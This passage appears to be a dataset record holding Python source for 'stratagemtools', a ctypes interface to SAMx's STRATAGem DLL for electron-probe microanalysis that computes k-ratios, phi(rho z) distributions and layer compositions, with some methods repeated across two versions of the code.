standard_\n ):\n self._raise_error('Cannot set standard')\n analyzed = experiment.is_analyzed()\n analyzed_ = c.c_bool(analyzed)\n logger.debug('StEdSetAnalyzedFlag(key, %i, %r)', ielt_.value, analyzed)\n if not self._lib.StEdSetAnalyzedFlag(self._key, ielt_, analyzed_):\n self._raise_error('Cannot add experiment analyzed flag')\n kratio_ = c.c_double(experiment.kratio)\n logger.debug('StEdSetExpK(key, %i, %i, %i, %f, %f, %f, 0.0, 2)',\n ielt_.value, iline_.value, iexpk_.value, experiment.energy_eV /\n 1000.0, experiment.energy_eV / 1000.0, experiment.kratio)\n if not self._lib.StEdSetExpK(self._key, ielt_, iline_, iexpk_, hv_,\n hv_, kratio_, c.c_double(0.0), c.c_int(2)):\n self._raise_error('Cannot set experiment k-ratio')\n if experiment.is_analyzed():\n indexes = ielt_.value, iline_.value, iexpk_.value\n self._experiments.setdefault(experiment, indexes)\n\n @_check_key\n def add_experiments(self, *exps):\n \"\"\"\n Adds several experiments::\n \n >>> strata.add_experiments(exp1, exp2, exp3)\n \"\"\"\n for exp in exps:\n self.add_experiment(exp)\n\n def get_experiments(self):\n \"\"\"\n Returns a :class:`tuple` of all defined experiments.\n \n :rtype: :class:`tuple`\n \"\"\"\n return tuple(self._experiments.keys())\n\n @_check_key\n def set_geometry(self, toa, tilt, azimuth):\n \"\"\"\n Sets the geometry.\n \n :arg toa: take off angle (in radians)\n :arg tilt: tilt angle (in radians)\n :arg azimuth: azimuthal angle (in radians)\n \"\"\"\n toa_ = c.c_double(toa)\n tilt_ = c.c_double(tilt)\n azimuth_ = c.c_double(azimuth)\n logger.debug('StSetGeomParams(key, %f, %f, %f)', toa, tilt, azimuth)\n if not self._lib.StSetGeomParams(self._key, toa_, tilt_, azimuth_):\n self._raise_error('Cannot set geometry parameters')\n\n @_check_key\n def get_geometry(self):\n \"\"\"\n Returns the geometry.\n \n :return: take off angle (in radians), tilt angle (in radians),\n azimuthal angle (in radians)\n \"\"\"\n toa_ = c.c_double()\n tilt_ = c.c_double()\n azimuth_ = c.c_double()\n logger.debug('StGetGeomParams(key)')\n if not self._lib.StGetGeomParams(self._key, c.byref(toa_), c.byref(\n tilt_), c.byref(azimuth_)):\n self._raise_error('Cannot get geometry parameters')\n return toa_.value, tilt_.value, azimuth_.value\n geometry = property(get_geometry, doc='Property to get geometry')\n\n @_check_key\n def set_prz_mode(self, mode):\n \"\"\"\n Sets the type of model to use for the :math:`\\\\phi(\\\\rho z)`.\n \n :arg mode: type of model, either\n \n * :data:`PRZMODE_XPP`\n * :data:`PRZMODE_PAP`\n * :data:`PRZMODE_GAU`\n :type mode: :class:`int`\n \"\"\"\n mode_ = c.c_int(mode)\n logger.debug('StSetPrzMode(%i)', mode)\n self._lib.StSetPrzMode(mode_)\n\n @_check_key\n def get_prz_mode(self):\n \"\"\"\n Returns the type of model to use for the :math:`\\\\phi(\\\\rho z)`.\n \n :return: either :data:`PRZMODE_XPP`, :data:`PRZMODE_PAP` or \n :data:`PRZMODE_GAU`\n :rtype: :class:`int`\n \"\"\"\n return self._lib.StGetPrzMode()\n prz_mode = property(get_prz_mode, set_prz_mode, doc=\n 'Property to get/set prz mode')\n\n @_check_key\n def set_fluorescence(self, flag):\n \"\"\"\n Sets the fluorescence flag.\n \n :arg flag: either \n \n * :data:`FLUORESCENCE_NONE`\n * :data:`FLUORESCENCE_LINE`\n * :data:`FLUORESCENCE_LINE_CONT`\n :type flag: :class:`int`\n \"\"\"\n flag_ = c.c_int(flag)\n logger.debug('StSetFluorFlg(%i)', flag)\n self._lib.StSetFluorFlg(flag_)\n\n @_check_key\n def get_fluorescence(self):\n \"\"\"\n Returns the fluorescence flag.\n \n :return: either :data:`FLUORESCENCE_NONE`, :data:`FLUORESCENCE_LINE`\n or :data:`FLUORESCENCE_LINE_CONT`\n :rtype: :class:`int`\n \"\"\"\n return self._lib.StGetFluorFlg()\n fluorescence = property(get_fluorescence, set_fluorescence, doc=\n 'Property to get/set fluorescence')\n\n @_check_key\n def set_standard_directory(self, dirpath):\n \"\"\"\n Sets the directory where standard files are stored.\n \n :arg dirpath: path to directory\n :type dirpath: :class:`str`\n \"\"\"\n dirpath_ = c.create_string_buffer(dirpath.encode('ascii'))\n self._lib.StSetDirectory(c.c_int(1), dirpath_)\n\n @_check_key\n def get_standard_directory(self):\n \"\"\"\n Returns the directory where standard files are stored.\n \n :rtype: :class:`str`\n \"\"\"\n dirpath = (c.c_char * 256)()\n self._lib.StGetDirectory(c.c_int(1), c.byref(dirpath), 256)\n return dirpath.value.decode('ascii')\n standard_directory = property(get_standard_directory,\n set_standard_directory, doc='Property to get/set standard directory')\n\n @_check_key\n def compute_kratio_vs_thickness(self, layer, thickness_low_m,\n thickness_high_m, step):\n \"\"\"\n Computes the variation of the k-ratio as a function of the thickness \n for a layer.\n \n :arg layer: layer of a sample (must have been previously added)\n :type layer: :class:`.Layer`\n \n :arg thickness_low_m: lower limit of the thickness in meters\n :type thickness_low_m: :class:`float`\n \n :arg thickness_high_m: upper limit of the thickness in meters\n :type thickness_high_m: :class:`float`\n \n :arg step: number of steps\n :type step: :class:`int`\n \n :return: :class:`tuple` containing\n \n * :class:`list` of thicknesses\n * :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are :class:`list` \n containing k-ratios for each thickness\n \"\"\"\n logger.debug('StSetKvsThicknessUnit(2)')\n self._lib.StSetKvsThicknessUnit(2)\n if layer not in self._layers:\n raise ValueError('Unknown layer')\n ilayer = self._layers[layer]\n ilayer_ = c.c_int(ilayer)\n step_ = c.c_int(step)\n logger.debug('StSetNbComputedHV(%i)', step)\n self._lib.StSetNbComputedHV(step_)\n low_ = c.c_double(thickness_low_m * 1000000000.0)\n high_ = c.c_double(thickness_high_m * 1000000000.0)\n logger.debug('StComputeKvsThickness(key, %i, %f, %f)', ilayer, \n thickness_low_m * 1000000000.0, thickness_high_m * 1000000000.0)\n if not self._lib.StComputeKvsThickness(self._key, ilayer_, low_, high_\n ):\n self._raise_error('Cannot compute k-ratio vs thickness')\n thicknesses = []\n kratios = {}\n thick_ = c.c_double()\n k_ = c.c_double()\n for i in range(step + 1):\n i_ = c.c_int(i)\n if not self._lib.StGetKvsT_Thick(self._key, i_, c.byref(thick_)):\n self._raise_error('Cannot get thickness')\n thicknesses.append(thick_.value)\n for experiment, indexes in self._experiments.items():\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n iHv_ = c.c_int(indexes[2])\n if not self._lib.StGetKvsT_K(self._key, i_, ielt_, iline_,\n iHv_, c.byref(k_)):\n self._raise_error('Cannot get k-ratio')\n kratios.setdefault(experiment, []).append(k_.value)\n return thicknesses, kratios\n\n @_check_key\n def compute_kratio_vs_energy(self, energy_high_eV, step):\n \"\"\"\n Computes the variation of the k-ratio as a function of the incident\n energy. \n Note that the computation also starts at 0 keV up to the specified energy.\n \n :arg energy_high_eV: upper limit of the thickness in electronvolts\n :type energy_high_eV: :class:`float`\n \n :arg step: number of steps\n :type step: :class:`int`\n \n :return: :class:`tuple` containing\n \n * :class:`list` of energies in electronvolts\n * :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are :class:`list` \n containing k-ratios for each energy\n \"\"\"\n step_ = c.c_int(step)\n logger.debug('StSetNbComputedHV(%i)', step)\n self._lib.StSetNbComputedHV(step_)\n energy_ = c.c_double(energy_high_eV / 1000.0)\n logger.debug('StSetMaxHV(%f)' % (energy_high_eV / 1000.0,))\n self._lib.StSetMaxHV(energy_)\n logger.debug('StComputeKvsHV(key)')\n if not self._lib.StComputeKvsHV(self._key):\n self._raise_error('Cannot compute k-ratio vs energy')\n energies = []\n kratios = {}\n k_ = c.c_double()\n bHV_ = c.c_bool(True)\n increment = float(energy_high_eV / 1000.0) / step\n for i in range(step + 1):\n hv = i * increment\n hv_ = c.c_double(hv)\n for experiment, indexes in self._experiments.items():\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n if not self._lib.StKvsHvOrRx(self._key, ielt_, iline_, hv_,\n bHV_, c.byref(k_)):\n self._raise_error('Cannot get k-ratio')\n kratios.setdefault(experiment, []).append(k_.value)\n energies.append(hv)\n return energies, kratios\n\n @_check_key\n def compute_kratios(self):\n \"\"\"\n Computes the k-ratios of the different experiments.\n \n :return: :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are k-ratios \n (:class:`float`).\n \"\"\"\n if len(self._layers) == 0:\n return self._compute_kratios_substrate()\n else:\n return self._compute_kratios_multilayers()\n\n @_check_key\n def _compute_kratios_multilayers(self):\n \"\"\"\n Internal method to compute the k-ratios using the \n :meth:`compute_kratio_vs_thickness`.\n \"\"\"\n for i, layer in enumerate(self._layers.keys()):\n if not layer.is_thickness_known():\n raise ValueError('Thickness of layer %i is unknown' % i)\n layer = list(self._layers.keys())[0]\n thickness_low_m = layer.thickness_m\n thickness_high_m = layer.thickness_m * 10\n step = 1\n _thicknesses, kratios = self.compute_kratio_vs_thickness(layer,\n thickness_low_m, thickness_high_m, step)\n output = {}\n for experiment, kratio in kratios.items():\n output.setdefault(experiment, kratio[0])\n return output\n\n @_check_key\n def _compute_kratios_substrate(self):\n \"\"\"\n Internal method to compute the k-ratios using the \n :meth:`compute_kratio_vs_energy`.\n \"\"\"\n output = {}\n step = 2\n for experiment in self._experiments:\n energy_high_eV = experiment.energy_eV\n _energies, kratios = self.compute_kratio_vs_energy(energy_high_eV,\n step)\n kratio = kratios[experiment][-1]\n if kratio < 0:\n logger.warn(\n 'STRATAGem returns a negative k-ratio, re-try with energy + 1 eV'\n )\n _energies, kratios = self.compute_kratio_vs_energy(\n energy_high_eV + 1.0, step)\n kratio = kratios[experiment][-1]\n output.setdefault(experiment, kratio)\n return output\n\n @_check_key\n def compute(self, iteration_max=50):\n \"\"\"\n Computes the unknown composition(s) and thickness(es) in the specified\n sample.\n \n :arg iteration_max: maximum number of iterations of the solve\n (default: 50)\n :type iteration_max: :class:`int`\n \n :return: calculated sample\n :rtype: :class:`.Sample`\n \"\"\"\n zs = set(exp.z for exp in self._experiments.keys())\n for layer in (list(self._layers.keys()) + [self._substrate[0]]):\n for z, wf in layer.composition.items():\n if z in zs:\n continue\n if wf is None:\n continue\n logger.debug('Added dummy experiment for z=%i', z)\n exp = Experiment(z, LINE_KA, 0.0, analyzed=False)\n self.add_experiment(exp)\n iteration_max_ = c.c_int(iteration_max)\n logger.debug('StSetMaxNbIter(%i)', iteration_max)\n self._lib.StSetMaxNbIter(iteration_max_)\n logger.debug('StComputeIterpStart(key)')\n if not self._lib.StComputeIterpStart(self._key):\n self._raise_error('Cannot start iteration')\n continue_ = c.c_bool(True)\n iteration = 0\n logger.debug('Start iteration')\n while True:\n iteration += 1\n logger.debug('Iteration #%i' % iteration)\n logger.debug('StComputeIterpNext(key, %r)' % continue_.value)\n if not self._lib.StComputeIterpNext(self._key, c.byref(continue_)):\n break\n if not continue_.value:\n break\n logger.debug('Iteration completed')\n thick_known = c.c_bool()\n mass_thickness = c.c_double()\n thickness = c.c_double()\n density = c.c_double()\n\n def get_layer(layer, ilayer):\n ilayer_ = c.c_int(ilayer)\n logger.debug('StSdGetNbElts(key, %i)' % ilayer)\n nbelt = self._lib.StSdGetNbElts(self._key, ilayer_)\n if nbelt == -1:\n self._raise_error('Cannot get number of elements')\n flag_ = (c.c_int * nbelt)()\n wfs_ = (c.c_double * nbelt)()\n logger.debug('StSdGetLayRawConcs(key, %i, flag, wfs)' % ilayer)\n if not self._lib.StSdGetLayRawConcs(self._key, ilayer_, flag_, wfs_\n ):\n self._raise_error('Cannot get layer concentration')\n composition = {}\n for z in layer.composition.keys():\n nra_ = c.c_int(z)\n logger.debug('StSdGetEltIdx(key, %i, %i)' % (ilayer, z))\n zindex = self._lib.StSdGetEltIdx(self._key, ilayer_, nra_)\n composition[z] = wfs_[zindex]\n logger.debug('StSdGetThick(key, %i)', ilayer)\n if not self._lib.StSdGetThick(self._key, ilayer_, c.byref(\n thick_known), c.byref(mass_thickness), c.byref(thickness),\n c.byref(density)):\n self._raise_error('Cannot get thickness')\n return (composition, thickness.value / 10000000000.0, \n mass_thickness.value * 10.0, density.value * 1000.0)\n sample = Sample(get_layer(*self._substrate)[0])\n for layer, ilayer in self._layers.items():\n sample.add_layer(*get_layer(layer, ilayer))\n return sample\n\n @_check_key\n def compute_prz(self, maxdepth_m=None, bins=100):\n \"\"\"\n Compute :math:`\\\\phi(\\\\rho z)` of all experiments.\n \n .. warning:: Only available for substrate (no layers).\n \n :arg maxdepth_m: maximum depth of the :math:`\\\\phi(\\\\rho z)` \n distribution in meters. If ``None``, Kanaya-Okayama electron range\n is used with a safety factor of 1.5.\n :type maxdepth_m: :class:`float`\n \n :arg bins: number of bins in the :math:`\\\\phi(\\\\rho z)` distribution\n :type bins: :class:`int`\n \n :return: a :class:`dict` where the keys are the experiments and the \n values are a tuple containing three lists:\n \n * :math:`\\\\rho z` coordinates (in g/cm2)\n * generated intensities of :math:`\\\\phi(\\\\rho z)` (no absorption)\n * emitted intensites of :math:`\\\\phi(\\\\rho z)`\n \"\"\"\n if len(self._layers) > 0:\n raise RuntimeError('PRZ can only be computed for substrate')\n hvs_eV = map(attrgetter('energy_eV'), self._experiments.keys())\n maxhv_eV = max(hvs_eV)\n maxhv_ = c.c_double(maxhv_eV / 1000.0)\n logger.debug('StSetScaleHV(%s)', maxhv_eV / 1000.0)\n self._lib.StSetScaleHV(maxhv_)\n logger.debug('StComputePrz(key)')\n if not self._lib.StComputePrz(self._key):\n self._raise_error('Cannot compute prz')\n przs = {}\n for experiment, indexes in self._experiments.items():\n if maxdepth_m is None:\n maxdepth_m = 0.0\n energy_keV = experiment.energy_eV / 1000.0\n for z, fraction in self._substrate[0].composition.items():\n dr = 0.0276 * atomic_mass_kg_mol(z\n ) * 1000.0 * energy_keV ** 1.67 / (z ** 0.89 *\n mass_density_kg_m3(z) / 1000.0)\n maxdepth_m += fraction / (dr * 1e-06)\n maxdepth_m = 1.0 / maxdepth_m\n maxdepth_m *= 1.5\n increment_kg_m2 = maxdepth_m * self._substrate[0\n ].density_kg_m3 / bins\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n ihv_ = c.c_int(0)\n rzs = []\n ys_generated = []\n ys_emitted = []\n for i in range(bins):\n rz_ = c.c_double(i * increment_kg_m2 * 0.1)\n rzs.append(i * increment_kg_m2)\n y_ = c.c_double()\n bUseExp_ = c.c_bool(True)\n self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,\n bUseExp_, c.byref(y_))\n ys_emitted.append(y_.value)\n y_ = c.c_double()\n bUseExp_ = c.c_bool(False)\n self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,\n bUseExp_, c.byref(y_))\n ys_generated.append(y_.value)\n przs.setdefault(experiment, (rzs, ys_generated, ys_emitted))\n return przs\n",
"step-5": "\"\"\"\nMain class of the interface.\nIt setups the experimental parameters such as the :class:`.Experiment`'s and\n:class:`.Sample`, geometry (:attr:`geometry <Stratagem.geometry>`), type of \n:math:`\\\\phi(\\\\rho z)` model (:attr:`prz_mode <Stratagem.prz_mode>`) and \nfluorescence mode (:attr:`fluorescence <Stratagem.fluorescence>`).\n\"\"\"\n\n# Standard library modules.\nimport os\nimport ctypes as c\nimport logging\nlogger = logging.getLogger(__name__)\nfrom operator import attrgetter\nimport random\nimport string\nimport functools\n\ntry:\n import winreg\nexcept ImportError:\n try:\n import _winreg as winreg\n except ImportError:\n class winreg:\n\n HKEY_CURRENT_USER = None\n\n class _PyHKEY(object):\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_value, traceback):\n pass\n\n def OpenKey(self, key, sub_key, res, sam):\n return self._PyHKEY()\n\n def QueryValueEx(self, key, value_name):\n return None\n\n# Third party modules.\n\n# Local modules.\nfrom stratagemtools.sample import Sample, CONC_UNKNOWN, CONC_DIFF\nfrom stratagemtools.experiment import Experiment, LINE_KA\nfrom stratagemtools.element_properties import \\\n atomic_mass_kg_mol, mass_density_kg_m3\n\n# Globals and constants variables.\n_REGISTRY_KEY = \"Software\\SAMx\\Stratagem\\Configuration\"\n_REGISTRY_VALUENAME = 'InstallOEMDirectory'\n\nPRZMODE_XPP = 0\n\"\"\":math:`\\\\phi(\\\\rho z)` from XPP\"\"\"\n\nPRZMODE_PAP = 1\n\"\"\":math:`\\\\phi(\\\\rho z)` from PAP\"\"\"\n\nPRZMODE_GAU = 2\n\"\"\":math:`\\\\phi(\\\\rho z)` *unknown*, possibly two Gaussians\"\"\"\n\nFLUORESCENCE_NONE = 0\n\"\"\"No fluorescence\"\"\"\n\nFLUORESCENCE_LINE = 1\n\"\"\"Only characteristic fluorescence\"\"\"\n\nFLUORESCENCE_LINE_CONT = 2\n\"\"\"Characteristic and Bremsstrahlung fluorescence\"\"\"\n\n_CONCENTRATION_FLAG_KNOWN = 0\n_CONCENTRATION_FLAG_UNKNOWN = 1\n_CONCENTRATION_FLAG_STOICHIOMETRIC = 2\n_CONCENTRATION_FLAG_TRACE = 3\n_CONCENTRATION_FLAG_DIFFERENCE = 4\n\nclass StratagemError(Exception):\n \"\"\"\n Exception raised for all errors related to the STRATAGem interface.\n \"\"\"\n pass\n\ndef _check_key(method):\n @functools.wraps(method)\n def wrapper(self, *args, **kwargs):\n if self._key is None:\n raise StratagemError('Not initialize. Call init().')\n return method(self, *args, **kwargs)\n return wrapper\n\nclass Stratagem:\n \"\"\"\n Main interface establishing a connection to the STRATAGem OEM interface and\n perform calculations using SAMx's STRATAGem.\n It is highly recommended to use :class:`Stratagem` as a context manager \n (i.e. ``with`` statement) to ensure that the connection to the DLL is \n properly closed.\n For instance::\n \n >>> with Stratagem() as strata:\n ... strata.prz_mode = PRZMODE_XPP\n \n Otherwise the following series of method must be called::\n \n >>> strata = Stratagem()\n >>> strata.init()\n >>> strata.prz_mode = PRZMODE_XPP\n >>> strata.close()\n \"\"\"\n\n def __init__(self, dll_path=None, display_error=True):\n \"\"\"\n :arg dll_path: complete path to the location of ``stratadllogger.dll``\n (optional). If ``None``, the path is found in the Windows registry\n under ``Software\\SAMx\\Stratagem\\Configuration``. If the DLL is not\n found a :class:`StratagemError` is raised.\n :type dll_path: :class:`str`\n \n :arg display_error: whether to display a message dialog on error\n :type display_error: :class:`bool`\n \"\"\"\n if dll_path is None:\n with winreg.OpenKey(winreg.HKEY_CURRENT_USER, _REGISTRY_KEY) as key: #@UndefinedVariable\n basedir = winreg.QueryValueEx(key, _REGISTRY_VALUENAME)[0] #@UndefinedVariable\n dll_path = os.path.join(basedir, 'bin', 'stratadll.dll')\n\n cwd = os.getcwd()\n try:\n logger.debug(\"dll=%s\", dll_path)\n self._lib = c.WinDLL(dll_path)\n finally:\n os.chdir(cwd) # Change back to real cwd\n\n logger.debug(\"StEnableErrorDisplay(%r)\", display_error)\n self._lib.StEnableErrorDisplay(c.c_bool(display_error))\n\n self._key = None\n self._cwd = os.getcwd()\n self._layers = {} # layer: index\n self._substrate = None\n self._experiments = {} # experiment: (element, line, kratio) indexes\n self._tmpstandards = []\n\n def __enter__(self):\n self.init()\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.close()\n return False\n\n def _stobjectnew(self, key=None, standard=False):\n if key is None:\n characters = string.ascii_lowercase\n key = ''.join(random.choice(characters) for _ in range(8))\n key = key.encode('ascii')\n if not isinstance(key, c.c_byte):\n key = c.create_string_buffer(key)\n\n bnormal_ = c.c_bool(not standard)\n iniflags_ = c.c_int(0)\n\n logger.debug(\"StObjectNew(key, %r, %i)\", not standard, 0)\n if not self._lib.StObjectNew(key, bnormal_, iniflags_):\n self._raise_error(\"Cannot create object\")\n\n return key\n\n def _raise_error(self, alternate=''):\n \"\"\"\n Raises a :class:`StratagemError`. \n The error code and message of known errors are retrieved from STRATAGem. \n If this is not possible, *alternate* is used as the error message.\n \"\"\"\n errnum_ = c.c_ulong()\n errtype_ = c.c_int()\n\n self._lib.StGetLastError(c.byref(errnum_), c.byref(errtype_))\n\n if errnum_.value != 0:\n if errtype_.value == 0:\n buf_ = c.create_string_buffer(256)\n self._lib.StGetMsg(errnum_, buf_, 256)\n raise StratagemError(buf_.value.decode('ascii'))\n elif errtype_.value == 1:\n raise c.WinError(errtype_.value)\n else:\n raise StratagemError('Error %i' % errnum_.value)\n else:\n raise StratagemError(alternate)\n\n def init(self):\n \"\"\"\n Initializes and setups STRATAGem.\n It does not have to be used if :class:`Stratagem` is used as a context\n manager.\n \"\"\"\n if self._key is not None:\n raise RuntimeError('Already initialized. Call close() first.')\n\n self._key = self._stobjectnew()\n self._cwd = os.getcwd()\n self.reset()\n\n def close(self):\n \"\"\"\n Closes the connection to the STRATAGem DLL.\n It does not have to be used if :class:`Stratagem` is used as a context\n manager.\n \"\"\"\n if self._key is not None:\n logger.debug('StObjectDelete(key)')\n self._lib.StObjectDelete(self._key)\n self._key = None\n\n for filepath in self._tmpstandards:\n os.remove(filepath)\n logger.debug('Remove temporary standard: %s', filepath)\n\n self.reset()\n\n def reset(self):\n \"\"\"\n Resets all parameters to the defaults, remove all experiments and sample.\n \"\"\"\n if self._key:\n self._lib.StObjectReset(self._key)\n os.chdir(self._cwd)\n self._layers.clear() # layer: index\n self._substrate = None\n self._experiments.clear() # analyzed experiments\n self._tmpstandards.clear()\n\n @_check_key\n def set_sample(self, sample):\n \"\"\"\n Sets the sample, which will be used in all subsequent calculations.\n Note that only one sample can be defined.\n \n :arg sample: sample definition\n :type sample: :class:`Sample`\n \"\"\"\n self.reset()\n\n for layer in sample.layers:\n index = self._add_layer(layer, substrate=False)\n self._layers.setdefault(layer, index)\n\n index = self._add_layer(sample.substrate, substrate=True)\n self._substrate = (sample.substrate, index)\n\n @_check_key\n def get_sample(self):\n \"\"\"\n Returns the current sample. \n It can correspond to the sample defined by :meth:`set_sample` or the\n sample resulting from the computations (see :meth:`compute`).\n \n .. note:: a new sample is returned every time this method is called\n \n :return: current sample\n :rtype: :class:`Sample`\n \"\"\"\n sample = Sample(self._substrate[0].composition)\n\n for layer in self._layers:\n sample.add_layer(layer.composition, layer.thickness_m,\n layer.mass_thickness_kg_m2, layer.density_kg_m3)\n\n return sample\n\n sample = property(get_sample, set_sample, doc=\"Property to set/get sample\")\n\n def _add_layer(self, layer, substrate=False, key=None):\n \"\"\"\n Internal method to add a layer from top to bottom. \n The last layer added is considered as the substrate.\n \n :arg layer: layer\n :type layer: :class:`.Layer`\n \n :return: index of the layer\n \"\"\"\n if key is None:\n key = self._key\n\n logger.debug(\"StSdAddLayer(key)\")\n ilayer_ = self._lib.StSdGetNbLayers(key)\n\n logger.debug(\"StSdAddLayer(key, %i)\", ilayer_)\n if not self._lib.StSdAddLayer(key, ilayer_):\n self._raise_error(\"Cannot add layer\")\n\n for i, value in enumerate(layer.composition.items()):\n ielt_ = c.c_int(i)\n logger.debug(\"StSdAddElt(key, %i, %i)\", ilayer_, i)\n if not self._lib.StSdAddElt(key, ilayer_, ielt_):\n self._raise_error(\"Cannot add element\")\n\n z, wf = value\n nra_ = c.c_int(z)\n logger.debug(\"StSdSetNrAtom(key, %i, %i, %i)\", ilayer_, i, z)\n if not self._lib.StSdSetNrAtom(key, ilayer_, ielt_, nra_):\n self._raise_error(\"Cannot set atomic number\")\n\n if wf is None or wf == CONC_UNKNOWN:\n flag = _CONCENTRATION_FLAG_UNKNOWN\n elif wf == CONC_DIFF:\n flag = _CONCENTRATION_FLAG_DIFFERENCE\n else:\n flag = _CONCENTRATION_FLAG_KNOWN\n\n wf_ = c.c_double(wf)\n logger.debug(\"StSdSetConc(key, %i, %i, %f)\", ilayer_, i, wf)\n if not self._lib.StSdSetConc(key, ilayer_, ielt_, wf_):\n self._raise_error(\"Cannot set concentration\")\n\n logger.debug(\"StSdSetConcFlag(key, %i, %i, %i)\", ilayer_, i, flag)\n if not self._lib.StSdSetConcFlag(key, ilayer_, ielt_, c.c_int(flag)):\n self._raise_error(\"Cannot set concentration flag\")\n\n if not substrate:\n thick_known = layer.is_thickness_known()\n thick_known_ = c.c_bool(thick_known)\n\n if layer.is_density_known():\n density = layer.density_kg_m3 / 1e3 # g/cm3\n else:\n density = 10.0\n density_ = c.c_double(density)\n\n if thick_known:\n thickness = layer.thickness_m * 1e10 # Angstroms\n mass_thickness = layer.mass_thickness_kg_m2 * 0.1 # g/cm2\n else:\n thickness = 0.0\n mass_thickness = 0.0\n thickness_ = c.c_double(thickness)\n mass_thickness_ = c.c_double(mass_thickness)\n\n logger.debug(\"StSdSetThick(key, %i, %r, %d, %d, %d)\", ilayer_,\n thick_known, mass_thickness, thickness, density)\n if not self._lib.StSdSetThick(key, ilayer_, thick_known_,\n mass_thickness_, thickness_, density_):\n self._raise_error(\"Cannot set thickness\")\n\n return int(ilayer_)\n\n def _create_standard(self, standard):\n \"\"\"\n Internal method to create a new object defining the standard \n :class:`.Sample`.\n \"\"\"\n # Create new object\n key_ = self._stobjectnew(standard=True)\n\n # Set sample\n for layer in standard.layers:\n self._add_layer(layer, substrate=False, key=key_)\n self._add_layer(standard.substrate, substrate=True, key=key_)\n\n # Save\n filename = key_.value.decode('ascii') + '.tfs'\n filepath = os.path.join(self.get_standard_directory(), filename)\n\n filepath_ = c.create_string_buffer(filepath.encode('ascii'))\n logger.debug('StObjectWriteFile(key, %s)', filepath)\n if not self._lib.StObjectWriteFile(key_, filepath_):\n self._raise_error(\"Cannot save standard\")\n\n # Delete object\n self._lib.StObjectDelete(key_)\n\n self._tmpstandards.append(filepath)\n\n return filepath\n\n @_check_key\n def add_experiment(self, experiment):\n \"\"\"\n Adds an experiment, i.e. measurements of k-ratio at different energies.\n \n .. hint:: Use :meth:`reset` method to remove defined experiments.\n \n :arg experiment: experiment\n :type experiment: :class:`Experiment`\n \"\"\"\n nra_ = c.c_int(experiment.z)\n klm_ = c.c_int(experiment.line)\n hv_ = c.c_double(experiment.energy_eV / 1e3)\n ielt_ = c.c_int()\n iline_ = c.c_int()\n iexpk_ = c.c_int()\n logger.debug('StEdAddNrAtomLineHV(key, %i, %i)', experiment.z, experiment.line)\n if not self._lib.StEdAddNrAtomLineHV(self._key, nra_, klm_, hv_,\n c.byref(ielt_), c.byref(iline_), c.byref(iexpk_)):\n self._raise_error(\"Cannot add atomic number and line\")\n\n standard = experiment.standard\n if isinstance(standard, Sample):\n standard = self._create_standard(standard)\n standard_ = c.create_string_buffer(standard.encode('ascii'))\n logger.debug('StEdSetLine(key, %i, %i, %i, %s)', ielt_.value, iline_.value, klm_.value, standard)\n if not self._lib.StEdSetLine(self._key, ielt_, iline_, klm_, standard_):\n self._raise_error(\"Cannot set standard\")\n\n analyzed = experiment.is_analyzed()\n analyzed_ = c.c_bool(analyzed)\n logger.debug(\"StEdSetAnalyzedFlag(key, %i, %r)\", ielt_.value, analyzed)\n if not self._lib.StEdSetAnalyzedFlag(self._key, ielt_, analyzed_):\n self._raise_error(\"Cannot add experiment analyzed flag\")\n\n kratio_ = c.c_double(experiment.kratio)\n logger.debug(\"StEdSetExpK(key, %i, %i, %i, %f, %f, %f, 0.0, 2)\",\n ielt_.value, iline_.value, iexpk_.value,\n experiment.energy_eV / 1e3, experiment.energy_eV / 1e3,\n experiment.kratio)\n if not self._lib.StEdSetExpK(self._key, ielt_, iline_, iexpk_,\n hv_, hv_, kratio_, c.c_double(0.0),\n c.c_int(2)):\n self._raise_error(\"Cannot set experiment k-ratio\")\n\n if experiment.is_analyzed():\n indexes = (ielt_.value, iline_.value, iexpk_.value)\n self._experiments.setdefault(experiment, indexes)\n\n @_check_key\n def add_experiments(self, *exps):\n \"\"\"\n Adds several experiments::\n \n >>> strata.add_experiments(exp1, exp2, exp3)\n \"\"\"\n for exp in exps:\n self.add_experiment(exp)\n\n def get_experiments(self):\n \"\"\"\n Returns a :class:`tuple` of all defined experiments.\n \n :rtype: :class:`tuple`\n \"\"\"\n return tuple(self._experiments.keys())\n\n @_check_key\n def set_geometry(self, toa, tilt, azimuth):\n \"\"\"\n Sets the geometry.\n \n :arg toa: take off angle (in radians)\n :arg tilt: tilt angle (in radians)\n :arg azimuth: azimuthal angle (in radians)\n \"\"\"\n toa_ = c.c_double(toa)\n tilt_ = c.c_double(tilt)\n azimuth_ = c.c_double(azimuth)\n logger.debug('StSetGeomParams(key, %f, %f, %f)', toa, tilt, azimuth)\n if not self._lib.StSetGeomParams(self._key, toa_, tilt_, azimuth_):\n self._raise_error(\"Cannot set geometry parameters\")\n\n @_check_key\n def get_geometry(self):\n \"\"\"\n Returns the geometry.\n \n :return: take off angle (in radians), tilt angle (in radians),\n azimuthal angle (in radians)\n \"\"\"\n toa_ = c.c_double()\n tilt_ = c.c_double()\n azimuth_ = c.c_double()\n logger.debug('StGetGeomParams(key)')\n if not self._lib.StGetGeomParams(self._key, c.byref(toa_),\n c.byref(tilt_), c.byref(azimuth_)):\n self._raise_error(\"Cannot get geometry parameters\")\n\n return toa_.value, tilt_.value, azimuth_.value\n\n geometry = property(get_geometry, doc='Property to get geometry')\n\n @_check_key\n def set_prz_mode(self, mode):\n \"\"\"\n Sets the type of model to use for the :math:`\\\\phi(\\\\rho z)`.\n \n :arg mode: type of model, either\n \n * :data:`PRZMODE_XPP`\n * :data:`PRZMODE_PAP`\n * :data:`PRZMODE_GAU`\n :type mode: :class:`int`\n \"\"\"\n mode_ = c.c_int(mode)\n logger.debug('StSetPrzMode(%i)', mode)\n self._lib.StSetPrzMode(mode_)\n\n @_check_key\n def get_prz_mode(self):\n \"\"\"\n Returns the type of model to use for the :math:`\\\\phi(\\\\rho z)`.\n \n :return: either :data:`PRZMODE_XPP`, :data:`PRZMODE_PAP` or \n 